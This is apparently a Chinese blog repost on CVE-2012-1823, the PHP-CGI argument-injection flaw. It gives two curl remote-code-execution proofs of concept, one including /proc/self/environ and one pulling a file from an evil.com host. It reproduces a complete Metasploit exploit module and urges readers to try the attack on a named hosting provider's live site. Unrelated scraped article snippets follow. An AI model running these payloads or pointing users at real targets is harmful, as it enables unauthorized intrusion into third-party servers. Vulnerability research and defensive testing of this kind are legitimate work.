yatere
yatere

CVE-2012-1823(PHP-CGI RCE)的PoC及技术挑战

国外又发布了一个牛逼闪闪的php cgi远程任意代码执行漏洞: http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/  

粗看一下貌似没啥危害,因为php做了防范,在cgi这个sapi下是无法使用-r,-f等直接执行命令的参数的。只有少数几个参数可以使用,因此公告里也就给出了 使用-s参数读取源文件的poc。  

另外关于RCE的PoC原文没有给出,不过说明的确可以远程执行代码。那么他是怎么做到的呢?我粗略想了想,可以利用的参数只有一个-d参数了,作用是给php定义一个ini的值。 

那么利用它能做什么呢?我给出如下两个RCE的PoC方案: 

1、本地包含直接执行代码: 
curl -H "USER-AGENT: <?system('id');die();?>" http://target.com/test.php?-dauto_prepend_file%3d/proc/self/environ+-n 

2、远程包含执行代码: 
curl http://target.com/test.php?-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3a%2f%2Fwww.evil.com%2fevil.txt 

经过测试以上两者都可以,但其实就是一个包含文件的两种使用而已。 

各位看看还有什么牛逼的方法可以绕过限制直接远程执行代码呢?这会是一个很好玩的技术挑战。 



http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/
        http://ompldr.org/vZGxxaQ
        http://zone.wooyun.org/content/151
        http://www.php-security.net/archives/9-New-PHP-CGI-exploit-CVE-2012-1823.html
        http://www.php-security.net/archives/11-Mitigation-for-CVE-2012-1823-CVE-2012-2311.html


MetaSploit提供了如下测试模块:

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

load 'lib/msf/core/exploit/http/server.rb'
require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
    Rank = NormalRanking

    include Msf::Exploit::Remote::HttpClient

    def initialize(info = {})
        super(update_info(info,
            'Name'           => 'PHP CGI Argument Injection',
            'Description'    => %q{
                When run as a CGI, PHP up to version 5.3.12 and 5.4.2 is vulnerable to
                an argument injection vulnerability.  This module takes advantage of
                the -d flag to set php.ini directives to achieve code execution.
                From the advisory: "if there is NO unescaped ‘=’ in the query string,
                the string is split on ‘+’ (encoded space) characters, urldecoded,
                passed to a function that escapes shell metacharacters (the “encoded in
                a system-defined manner” from the RFC) and then passes them to the CGI
                binary."
            },
            'Author'         => [ 'egypt', 'hdm' ],
            'License'        => MSF_LICENSE,
            'Version'        => '$Revision$',
            'References'     => [
                    [ "CVE"    , "2012-1823" ],
                    [ "URL"    , "http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/" ],
                ],
            'Privileged'     => false,
            'Payload'        =>
                {
                    'DisableNops' => true,
                    # Arbitrary big number. The payload gets sent as an HTTP
                    # response body, so really it's unlimited
                    'Space'       => 262144, # 256k
                },
            'DisclosureDate' => 'May 03 2012',
            'Platform'       => 'php',
            'Arch'           => ARCH_PHP,
            'Targets'        => [[ 'Automatic', { }]],
            'DefaultTarget' => 0))

        register_options([
            OptString.new('TARGETURI', [false, "The URI to request"]),
            ], self.class)
    end

    # php-cgi -h
    # ...
    #   -s               Display colour syntax highlighted source.
    def check
        uri = target_uri.path
        if(uri and ! uri.empty?)
            uri.gsub!(/\?.*/, "")

            print_status("Checking uri #{uri}")

            response = send_request_raw({ 'uri' => uri })

            if response and response.code == 200 and response.body =~ /\<code\>\<span style.*\<\;\?/mi
                print_error("Server responded in a way that was ambiguous, could not determine whether it was vulnerable")
                return Exploit::CheckCode::Unknown
            end

            response = send_request_raw({ 'uri' => uri + '?-s'})
            if response and response.code == 200 and response.body =~ /\<code\>\<span style.*\<\;\?/mi
                return Exploit::CheckCode::Vulnerable
            end

            print_error("Server responded indicating it was not vulnerable")
            return Exploit::CheckCode::Safe
        else
            return Exploit::CheckCode::Unknown
        end
    end

    def exploit
        #sleep 100
        begin
            php_trues  = [ "1", "on", "true" ]
            php_falses = [ "0", "off", "false" ]
            args = [
                "-d+allow_url_include%3d#{rand_php_ini_true}",
                "-d+auto_prepend_file%3dphp://input",
            ]

            qs = args.join("+")
            uri = "#{target_uri}?#{qs}"
            p uri

            # Has to be all on one line, so gsub out the comments and the newlines
            payload_oneline = "<?php " +payload.encoded.gsub(/\s*#.*$/, "").gsub("\n", "")
            response = send_request_cgi( {
                'method' => "POST",
                'global' => true,
                'uri'    => uri,
                'data'   => payload_oneline,
            }, 0.1)
            handler

        rescue ::Interrupt
            raise $!
        rescue ::Rex::HostUnreachable, ::Rex::ConnectionRefused
            print_error("The target service unreachable")
        rescue ::OpenSSL::SSL::SSLError
            print_error("The target failed to negotiate SSL, is this really an SSL service?")
        end
    end

    def rand_php_ini_false
        [ "0", "off", "false" ].sort_by{rand}.first
    end

    def rand_php_ini_true
        [ "1", "on", "true" ].sort_by{rand}.first
    end

end


目前绝大多数虚拟主机提供商都是CGI方式,例如:

 http://www.yihengit.com.cn/php.php 
,有兴趣可以去试一试


你可能感兴趣的:(PHP,ssl,File,cgi,include,licensing)

  • 出租车计价器 C51 CHG727 51单片机51单片机
    #include#include#include"ds1302.h"#include"temp.h"intmiao=0;intfen=0;uinti=0;inta;ucharluchen=0;//路程ucharyuan=0;//费用uchartime1=0;//路程时间floatuprice=1.2;uintustar=0;uchartimenow[6];ucharsetplace;bitsets
  • nginx中间件部署 cxy_6 nginx中间件运维
    普通权限账户安装NGINX中间件1、拥有高级权限的账户安装必要的插件sudoyuminstall-ygcc-c++makepcrepcre-develzlibzlib-developensslopenssl-devel2、普通账户进行NGINX的脚本式安装vinginx_intall.sh#!/bin/bashTAR_NAME="$1"TAR_NAME_DIR=`basenamenginx-1.2
  • 如何使用PHP进行单元测试:工具与方法 挚***沾 php经验php单元测试
    如何使用PHP进行单元测试:工具与方法单元测试是软件开发中不可或缺的一部分,它能够确保代码的每个独立单元(如函数、类或方法)在隔离环境中按预期工作。对于PHP开发者来说,掌握单元测试的工具和方法是提高代码质量和开发效率的关键。本文将详细介绍如何使用PHP进行单元测试,涵盖常用的工具、编写测试用例的方法以及最佳实践。1.单元测试的重要性在深入讨论工具和方法之前,首先需要明确单元测试的重要性。单元测试
  • PHP安全最佳实践:防御XSS与CSRF攻击 挚***沾 php经验php安全xss
    PHP安全最佳实践:防御XSS与CSRF攻击在Web开发中,安全性是一个至关重要的方面。PHP作为一种广泛使用的服务器端脚本语言,常常成为攻击者的目标。本文将重点讨论如何通过最佳实践来防御两种常见的Web攻击:跨站脚本攻击(XSS)和跨站请求伪造(CSRF)。1.跨站脚本攻击(XSS)防御1.1什么是XSS攻击?跨站脚本攻击(XSS)是一种注入攻击,攻击者通过在网页中插入恶意脚本,使得这些脚本在用
  • 使用中间件架构优化PHP应用的请求处理流程 挚***沾 php经验中间件架构php
    使用中间件架构优化PHP应用的请求处理流程在现代Web应用开发中,请求处理流程的优化是提升应用性能和可维护性的关键。中间件架构作为一种设计模式,能够有效地解耦请求处理逻辑,增强代码的可扩展性和可测试性。本文将探讨如何在PHP应用中使用中间件架构来优化请求处理流程,并通过代码示例展示其实现方式。1.中间件架构概述中间件(Middleware)是一种在请求和响应之间进行处理的组件。它允许开发者在请求到
  • Linux书签上下移动 海天鹰 Qtqt
    步骤读书签文件,分割到QStringList,点击右键菜单获取序号,交换序号,写书签文件。QStringList.swap(int,int)过时,QStringList.swapItemsAt(int,int)代替。书签文件路径mainwindow.hconstQStringfilepath_bookmark=QStandardPaths::writableLocation(QStandardPa
  • LFI 临时文件RCE总结 dwm2 基础漏洞总结php
    PHPLFI即本地文件包含漏洞,通过包含本地服务器上存储的一些文件,例如session文件、日志文件、临时文件等达到拿服务器权限的目的。比较常用的方法有:PHPINFO()和PHP7SegmentFault。他们的基本原理都是向服务器上传生成恶意的临时文件,再对恶意文件进行包含即可RCE。临时文件文件名由于临时文件名是由随机函数生成的,我们需要获取正确的文件名,也就是$_FILES['userfi
  • 【JVM】卸载JDK后问题could not open …jvm.cfg =PNZ=BeijingL Javajvm
    问题现象MicrosoftWindows[版本10.0.18363.592](c)2019MicrosoftCorporation。保留所有权利。C:\Users\User>java-versionError:couldnotopen`C:\ProgramFiles\Java\jre6\lib\amd64\jvm.cfg'出现这种情况大多是因为电脑上之前安装过JDK,卸载后没有处理完成造成卸载重装
  • php后端分页_thinkphp5框架前后端分离项目实现分页功能的方法分析 淡定男 php后端分页
    本文实例讲述了thinkphp5框架前后端分离项目实现分页功能的方法。分享给大家供大家参考,具体如下:方法一利用tp5提供的paginate方法实现自动分页参数page第几页,paginate分页方法会自动获取size每页数量代码/***Notes:消费记录*Date:2019/6/25*Time:15:43*@paramRequest$request*@return\think\response
  • python flask 分页_Python的Flask框架中实现分页功能的教程 weixin_39959126 pythonflask分页
    BlogPosts的提交让我们从简单的开始。首页上必须有一张用户提交新的post的表单。首先我们定义一个单域表单对象(fileapp/forms.py):classPostForm(Form):post=TextField('post',validators=[Required()])下面,我们把这个表单添加到template中(fileapp/templates/index.html):{%ex
  • 【prompt实战】知乎问题解答专家 姚瑞南 prompt实战应用案例prompt
    本文原创作者:姚瑞南AI-agent大模型运营专家,先后任职于美团、猎聘等中大厂AI训练专家和智能运营专家岗;多年人工智能行业智能产品运营及大模型落地经验,拥有AI外呼方向国家专利与PMP项目管理证书。(转载需经授权)#Role:知乎问题解答分类专家##Profile:你是一个知乎问题解答分类专家,主要帮助用户解答各类领域专业问题,包括但不限于金融领域、职场问题、互联网领域、科技领域、人工智能领域
  • SSL证书自动续签(解决泛域名续签问题) 月会 ssl自动续签
    文章目录SSL证书自动生成并自动续期Let’sEncryptCertbot介绍申请ssl证书下载certbot申请证书非泛域名申请证书nginx使用证书证书续期脚本linux定时执行脚本泛域名SSL证书自动生成并自动续期自动续期使用Let’sEncrypt证书颁发机构和certbot客户端共同完成Let’sEncryptLet’sEncrypt是一家免费、开放、自动化的证书颁发机构(CA),为公众
  • 使用 certbot 在centos7 搭建ssl证书自动并且续约 TwoSs110 sslhttps
    第一步,确定服务器适合安装的certbot版本sudoyuminstallpython27如果上述方法不起作用,你可以尝试编译安装。首先,你需要安装编译Python所需的依赖包。sudoyuminstallgccmakeopenssl-develsqlite-develreadline-develzlib-develbzip2-devel接下来,下载Python2.7.5的源代码,并进行编译安装。
  • AtCoder Beginner Contest 370 A-E 题解 AKDreamer_HeXY AtCoderBeginnerContests题解算法c++数据结构贪心算法
    A.RaiseBothHands题意给你L,R(0≤L,R≤1)L,R\(0\leL,R\le1)L,R(0≤L,R≤1),分别代表举左手和右手,若只举左手输出Yes,只举右手输出No,否则输出Invalid思路若L=RL=RL=R则为invalid,其余L=1L=1L=1输出Yes,R=1R=1R=1输出NoC++代码#includeusingnamespacestd;intl,r;intmai
  • 串排序(信息学奥赛一本通-2048) Doopny@ 信息学奥赛一本通算法
    【题目描述】对给定的n(1≤n≤20)个国家名(国家名字长度不超过20),按其字母的顺序输出。【输入】第一行为国家的个数n;以下n行为国家的名字。【输出】n行,排序后的国名。【输入样例】3KoreaChinaJapan【输出样例】ChinaJapanKorea【题解代码】#includeusingnamespacestd;constintN=2e1+10;stringstr[N];intmain(
  • Certbot实现SSL免费证书自动续签(CentOS 7版 + Docker部署的nginx) 程序猿S先森丶 sslcentosdocker
    前置安装,可参考Certbot实现SSL免费证书自动续签(CentOS7+nginx/apache)如果是通过Docker运行Nginx,certbot无法直接检测到本地的Nginx配置。解决方案是使用standalone模式或挂载Webroot方式获取SSL证书,并手动配置Nginx。方案1:Standalone模式(临时关闭Nginx获取证书)如果你的服务器不支持Webroot(或Nginx配
  • PKI及SSL协议分析实验报告 只会复制粘贴的 sslhttps服务器
    PKI及SSL协议分析实验报告一、实验目的通过该实验了解和掌握证书服务的安装,理解证书的发放过程,掌握在WEB服务器上配置SSL,使用HTTPS协议访问网站以验证结果,最后对HTTPS协议进行分析。二、实验环境WindowServer*2本实验中自己指定CA服务器与申请证书的网站。实验过程中建议使用IE浏览器,如果不使用IE,可能会导致后续实验过程中证书不能下载。三、实验内容与实验要求实验内容、原
  • php openssl tls1.2,openssl建立tls1连接过程(s->state的变化过程) 开源故事 phpopenssltls1.2
    以下是调用openssl建立tls1连接过程中,openssl内部对握手阶段的处理过程,可以对照抓包观察以下服务端和客户端是并行进行的,只是需要接收对端消息时才会进入等待状态.为方面理解,所以将客户端和服务端的处理按顺序排好.具体的状态转换代码请见:server端/ssl/s3_srvr.c的ssl3_accept方法client端/ssl/s3_clnt.c的ssl3_connect方法clie
  • openssl TLS 单向认证 spring*-* 网络服务器运维
    下面是一个简单的C语言程序示例,它展示了如何使用OpenSSL来实现基于TLS的加密TCP通信。这个程序包括一个服务器和一个客户端,它们通过TLS加密的TCP连接进行通信。步骤概览初始化OpenSSL库。创建SSL上下文(SSL_CTX)。在服务器端,加载服务器证书和私钥;在客户端,加载CA证书。使用SSL套接字进行加密通信。服务器端代码c复制代码#include#include#include#
  • server和client通信双方双向认证,基于openssl,使用TLS加密TCP流量 spring*-* tcp/ip服务器网络协议
    设计一个基于OpenSSL的C语言程序来实现双向认证的TLS加密TCP通信,需要包含服务器和客户端两部分。以下是该程序的核心步骤及示例代码。生成证书和私钥首先,需要为服务器和客户端生成证书和私钥。可以使用OpenSSL命令行工具生成这些文件。bash复制代码生成CA私钥和自签名证书opensslgenrsa-outca.key2048opensslreq-x509-new-nodes-keyca.
  • SSL 和 TLS 认证 百里自来卷 ssl网络协议网络
    SSL(SecureSocketsLayer,安全套接层)认证是一种用于加密网络通信和验证服务器身份的安全技术。它是TLS(TransportLayerSecurity,传输层安全协议)的前身,虽然现在大多数应用使用的是TLS,但仍习惯性地称之为SSL认证。SSL认证SSL认证的核心作用数据加密:防止数据在传输过程中被窃取或篡改,保证机密性。身份验证:验证服务器身份,防止用户连接到伪造的服务器(如
  • SSL的原理和应用 m0_74092749 ssl网络协议网络
    前言:SSL协议便是Internet上应用最为广泛的网络数据安全传输协议。SSL协议隶属于会话层,处于有连接的会话层之上,它一经产生就在Internet领域发挥了它的巨大作用。目前,国外著名的商用浏览器和Web服务器都支持SSL协议,SSL已成为最流行的WWW安全协议。目前已经有若干国外厂商推出了基于SSL的安全产品,但是协议在核心密码算法上都有出口限制,大多采用一些低安全强度的算法,而且协议代码
  • IIS网站用myssl评级为B级 bigsea76 windowsssl
    不光是IIS网站,包括.net使用HttpListener开发的web程序,在默认情况下都会被评为B级。提示为:降级原因:1.没有使用AEAD系列加密套件,降级为B2.没有优先使用FS系列加密套件,降级为B。我现在知道AEAD系列加密套件指的是那些支持认证加密和关联数据(AuthenticatedEncryptionwithAssociatedData)的套件,比如AES-GCM和ChaCha20
  • 《C++ primer》第六章 鱼不如渔 C++Primer第五版——读书笔记c++开发语言
    一、函数基础函数的定义包括:返回类型、函数名、形参列表、函数体/*编写函数*/intfact(intval){intret=1;while(val>1)ret*=val--;returnret;}/*调用函数*/intmain(void){intj=fact(5);cout#includeusingnamespacestd;intmain(intargc,char*argv[]){//检查是否提供
  • Qt之动画编程之窗体透明度效果 我不是程序员~~~~ Qt实战qtandroid开发语言
    #ifndefOPACITY_WIDGET_H#defineOPACITY_WIDGET_H#include#includeclassopacity_widget:publicQWidget{Q_OBJECTQ_PROPERTY(qrealopacityREADwindowOpacityWRITEsetWindowOpacity)public:opacity_widget(QWidget*pare
  • 【AI热点】OpenAI新发布API技术深度洞察 碣石潇湘无限路 人工智能
    以下内容基于对OpenAI最新发布的AgentAPI及相关工具的官方信息、技术演示和已有报道进行综合解读与深度分析,供您参考。本报告将围绕最新发布的ResponsesAPI(智能体核心新接口)、内置工具(websearch、filesearch、computeruse)、全新的AgentsSDK以及核心安全与可观测性机制,帮助您深入理解其原理、特性及应用价值。一、背景:为什么要推出新的AgentA
  • nodeJs获取某个文件夹下的所有文件信息 努力的白熊 node.jsjavascript前端vue.js
    constfs=require('fs');constpath=require('path');functiongetAllFilesInfo(dirPath){constitemsInfo=[];functiontraverseDirectory(currentPath){constitems=fs.readdirSync(currentPath);for(constitemofitems){c
  • Java 将 byte[] 转换为 File 对象 我真的不想做程序员 javajava开发语言后端数据结构算法
    目录一、将byte[]转换为File对象二、完整示例三、总结在Java开发中,将字节数组(byte[])转换为文件对象(File)是一个常见的需求。这种需求常见于处理文件上传、下载以及与其他系统集成的场景。本文将详细介绍如何实现这一功能,并提供具体代码示例。一、将byte[]转换为File对象在Java中,可以使用java.io包中的File类和FileOutputStream类来将字节数组转换为
  • C++面向对象三大特性 CodeCuriosity C++c++开发语言
    一、封装封装是将数据和操作数据的函数捆绑在一起形成类,通过访问控制限定符(如private、protected、public)隐藏对象的内部细节,仅对外提供必要接口,以此增强代码的安全性和可维护性。#includeclassBankAccount{private:doublebalance;//私有成员变量,外部无法直接访问public://构造函数,用于初始化账户余额BankAccount(do
  • C 结构体基础练习题 噜噜soeur c语言开发语言
    这些题目都是我自己练过挑选出来的,有错误请指出哦谢谢定义一个名为“Student”的结构体,其中包含成员的name(姓名)、age(年龄)和totalMarks(总分)。编写一个C程序来输入两个学生的数据,显示他们的信息,并找到总分的平均值。#includestructStudent{charname[50];intage;floattotalMarks;};intmain(){//Declare
  • 关于旗正规则引擎中的MD5加密问题 何必如此 jspMD5规则加密
    一般情况下,为了防止个人隐私的泄露,我们都会对用户登录密码进行加密,使数据库相应字段保存的是加密后的字符串,而非原始密码。 在旗正规则引擎中,通过外部调用,可以实现MD5的加密,具体步骤如下: 1.在对象库中选择外部调用,选择“com.flagleader.util.MD5”,在子选项中选择“com.flagleader.util.MD5.getMD5ofStr({arg1})”; 2.在规
  • 【Spark101】Scala Promise/Future在Spark中的应用 bit1129 Promise
    Promise和Future是Scala用于异步调用并实现结果汇集的并发原语,Scala的Future同JUC里面的Future接口含义相同,Promise理解起来就有些绕。等有时间了再仔细的研究下Promise和Future的语义以及应用场景,具体参见Scala在线文档:http://docs.scala-lang.org/sips/completed/futures-promises.html
  • spark sql 访问hive数据的配置详解 daizj spark sqlhivethriftserver
    spark sql 能够通过thriftserver 访问hive数据,默认spark编译的版本是不支持访问hive,因为hive依赖比较多,因此打的包中不包含hive和thriftserver,因此需要自己下载源码进行编译,将hive,thriftserver打包进去才能够访问,详细配置步骤如下:   1、下载源码   2、下载Maven,并配置 此配置简单,就略过
  • HTTP 协议通信 周凡杨 javahttpclienthttp通信
                            一:简介  HTTPCLIENT,通过JAVA基于HTTP协议进行点与点间的通信!     二: 代码举例      测试类: import java
  • java unix时间戳转换 g21121 java
    把java时间戳转换成unix时间戳: Timestamp appointTime=Timestamp.valueOf(new SimpleDateFormat("yyyy-MM-dd HH:mm:ss").format(new Date())) SimpleDateFormat df = new SimpleDateFormat("yyyy-MM-dd hh:m
  • web报表工具FineReport常用函数的用法总结(报表函数) 老A不折腾 web报表finereport总结
    说明:本次总结中,凡是以tableName或viewName作为参数因子的。函数在调用的时候均按照先从私有数据源中查找,然后再从公有数据源中查找的顺序。   CLASS CLASS(object):返回object对象的所属的类。   CNMONEY CNMONEY(number,unit)返回人民币大写。 number:需要转换的数值型的数。 unit:单位,
  • java jni调用c++ 代码 报错 墙头上一根草 javaC++jni
    # # A fatal error has been detected by the Java Runtime Environment: # #  EXCEPTION_ACCESS_VIOLATION (0xc0000005) at pc=0x00000000777c3290, pid=5632, tid=6656 # # JRE version: Java(TM) SE Ru
  • Spring中事件处理de小技巧 aijuans springSpring 教程Spring 实例Spring 入门Spring3
    Spring 中提供一些Aware相关de接口,BeanFactoryAware、 ApplicationContextAware、ResourceLoaderAware、ServletContextAware等等,其中最常用到de匙ApplicationContextAware.实现ApplicationContextAwaredeBean,在Bean被初始后,将会被注入 Applicati
  • linux shell ls脚本样例 annan211 linuxlinux ls源码linux 源码
    #! /bin/sh - #查找输入文件的路径 #在查找路径下寻找一个或多个原始文件或文件模式 # 查找路径由特定的环境变量所定义 #标准输出所产生的结果 通常是查找路径下找到的每个文件的第一个实体的完整路径 # 或是filename :not found 的标准错误输出。 #如果文件没有找到 则退出码为0 #否则 即为找不到的文件个数 #语法 pathfind [--
  • List,Set,Map遍历方式 (收集的资源,值得看一下) 百合不是茶 listsetMap遍历方式
    List特点:元素有放入顺序,元素可重复 Map特点:元素按键值对存储,无放入顺序 Set特点:元素无放入顺序,元素不可重复(注意:元素虽然无放入顺序,但是元素在set中的位置是有该元素的HashCode决定的,其位置其实是固定的) List接口有三个实现类:LinkedList,ArrayList,Vector LinkedList:底层基于链表实现,链表内存是散乱的,每一个元素存储本身
  • 解决SimpleDateFormat的线程不安全问题的方法 bijian1013 javathread线程安全
    在Java项目中,我们通常会自己写一个DateUtil类,处理日期和字符串的转换,如下所示: public class DateUtil01 { private SimpleDateFormat dateformat = new SimpleDateFormat("yyyy-MM-dd HH:mm:ss"); public void format(Date d
  • http请求测试实例(采用fastjson解析) bijian1013 http测试
            在实际开发中,我们经常会去做http请求的开发,下面则是如何请求的单元测试小实例,仅供参考。 import java.util.HashMap; import java.util.Map; import org.apache.commons.httpclient.HttpClient; import
  • 【RPC框架Hessian三】Hessian 异常处理 bit1129 hessian
    RPC异常处理概述   RPC异常处理指是,当客户端调用远端的服务,如果服务执行过程中发生异常,这个异常能否序列到客户端?   如果服务在执行过程中可能发生异常,那么在服务接口的声明中,就该声明该接口可能抛出的异常。   在Hessian中,服务器端发生异常,可以将异常信息从服务器端序列化到客户端,因为Exception本身是实现了Serializable的
  • 【日志分析】日志分析工具 bit1129 日志分析
    1. 网站日志实时分析工具 GoAccess http://www.vpsee.com/2014/02/a-real-time-web-log-analyzer-goaccess/ 2. 通过日志监控并收集 Java 应用程序性能数据(Perf4J) http://www.ibm.com/developerworks/cn/java/j-lo-logforperf/ 3.log.io 和
  • nginx优化加强战斗力及遇到的坑解决 ronin47 nginx 优化
       先说遇到个坑,第一个是负载问题,这个问题与架构有关,由于我设计架构多了两层,结果导致会话负载只转向一个。解决这样的问题思路有两个:一是改变负载策略,二是更改架构设计。    由于采用动静分离部署,而nginx又设计了静态,结果客户端去读nginx静态,访问量上来,页面加载很慢。解决:二者留其一。最好是保留apache服务器。      来以下优化:      
  • java-50-输入两棵二叉树A和B,判断树B是不是A的子结构 bylijinnan java
    思路来自: http://zhedahht.blog.163.com/blog/static/25411174201011445550396/ import ljn.help.*; public class HasSubtree { /**Q50. * 输入两棵二叉树A和B,判断树B是不是A的子结构。 例如,下图中的两棵树A和B,由于A中有一部分子树的结构和B是一
  • mongoDB 备份与恢复 开窍的石头 mongDB备份与恢复
    Mongodb导出与导入 1: 导入/导出可以操作的是本地的mongodb服务器,也可以是远程的. 所以,都有如下通用选项: -h host   主机 --port port    端口 -u username 用户名 -p passwd   密码 2: mongoexport 导出json格式的文件
  • [网络与通讯]椭圆轨道计算的一些问题 comsci 网络
         如果按照中国古代农历的历法,现在应该是某个季节的开始,但是由于农历历法是3000年前的天文观测数据,如果按照现在的天文学记录来进行修正的话,这个季节已经过去一段时间了。。。。。       也就是说,还要再等3000年。才有机会了,太阳系的行星的椭圆轨道受到外来天体的干扰,轨道次序发生了变
  • 软件专利如何申请 cuiyadll 软件专利申请
    软件技术可以申请软件著作权以保护软件源代码,也可以申请发明专利以保护软件流程中的步骤执行方式。专利保护的是软件解决问题的思想,而软件著作权保护的是软件代码(即软件思想的表达形式)。例如,离线传送文件,那发明专利保护是如何实现离线传送文件。基于相同的软件思想,但实现离线传送的程序代码有千千万万种,每种代码都可以享有各自的软件著作权。申请一个软件发明专利的代理费大概需要5000-8000申请发明专利可
  • Android学习笔记 darrenzhu android
    1.启动一个AVD 2.命令行运行adb shell可连接到AVD,这也就是命令行客户端 3.如何启动一个程序   am start -n package name/.activityName   am start -n com.example.helloworld/.MainActivity 启动Android设置工具的命令如下所示: # am start -
  • apache虚拟机配置,本地多域名访问本地网站 dcj3sjt126com apache
    现在假定你有两个目录,一个存在于 /htdocs/a,另一个存在于 /htdocs/b 。 现在你想要在本地测试的时候访问 www.freeman.com 对应的目录是 /xampp/htdocs/freeman ,访问 www.duchengjiu.com 对应的目录是 /htdocs/duchengjiu。 1、首先修改C盘WINDOWS\system32\drivers\etc目录下的
  • yii2 restful web服务[速率限制] dcj3sjt126com PHPyii2
    速率限制 为防止滥用,你应该考虑增加速率限制到您的API。 例如,您可以限制每个用户的API的使用是在10分钟内最多100次的API调用。 如果一个用户同一个时间段内太多的请求被接收, 将返回响应状态代码 429 (这意味着过多的请求)。 要启用速率限制, [[yii\web\User::identityClass|user identity class]] 应该实现 [[yii\filter
  • Hadoop2.5.2安装——单机模式 eksliang hadoophadoop单机部署
    转载请出自出处:http://eksliang.iteye.com/blog/2185414 一、概述        Hadoop有三种模式 单机模式、伪分布模式和完全分布模式,这里先简单介绍单机模式 ,默认情况下,Hadoop被配置成一个非分布式模式,独立运行JAVA进程,适合开始做调试工作。   二、下载地址 Hadoop 网址http:
  • LoadMoreListView+SwipeRefreshLayout(分页下拉)基本结构 gundumw100 android
    一切为了快速迭代 import java.util.ArrayList; import org.json.JSONObject; import android.animation.ObjectAnimator; import android.os.Bundle; import android.support.v4.widget.SwipeRefreshLayo
  • 三道简单的前端HTML/CSS题目 ini htmlWeb前端css题目
    使用CSS为多个网页进行相同风格的布局和外观设置时,为了方便对这些网页进行修改,最好使用( )。http://hovertree.com/shortanswer/bjae/7bd72acca3206862.htm   在HTML中加入<table style=”color:red; font-size:10pt”>,此为( )。http://hovertree.com/s
  • overrided方法编译错误 kane_xie override
    问题描述: 在实现类中的某一或某几个Override方法发生编译错误如下: Name clash: The method put(String) of type XXXServiceImpl has the same erasure as put(String) of type XXXService but does not override it   当去掉@Over
  • Java中使用代理IP获取网址内容(防IP被封,做数据爬虫) mcj8089 免费代理IP代理IP数据爬虫JAVA设置代理IP爬虫封IP
    推荐两个代理IP网站:   1. 全网代理IP:http://proxy.goubanjia.com/   2. 敲代码免费IP:http://ip.qiaodm.com/   Java语言有两种方式使用代理IP访问网址并获取内容,   方式一,设置System系统属性   // 设置代理IP System.getProper
  • Nodejs Express 报错之 listen EADDRINUSE qiaolevip 每天进步一点点学习永无止境nodejs纵观千象
    当你启动 nodejs服务报错: >node app Express server listening on port 80 events.js:85 throw er; // Unhandled 'error' event ^ Error: listen EADDRINUSE at exports._errnoException (
  • C++中三种new的用法 _荆棘鸟_ C++new
    转载自:http://news.ccidnet.com/art/32855/20100713/2114025_1.html 作者: mt 其一是new operator,也叫new表达式;其二是operator new,也叫new操作符。这两个英文名称起的也太绝了,很容易搞混,那就记中文名称吧。new表达式比较常见,也最常用,例如: string* ps = new string("
  • Ruby深入研究笔记1 wudixiaotie Ruby
    module是可以定义private方法的 module MTest def aaa puts "aaa" private_method end private def private_method puts "this is private_method" end end
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他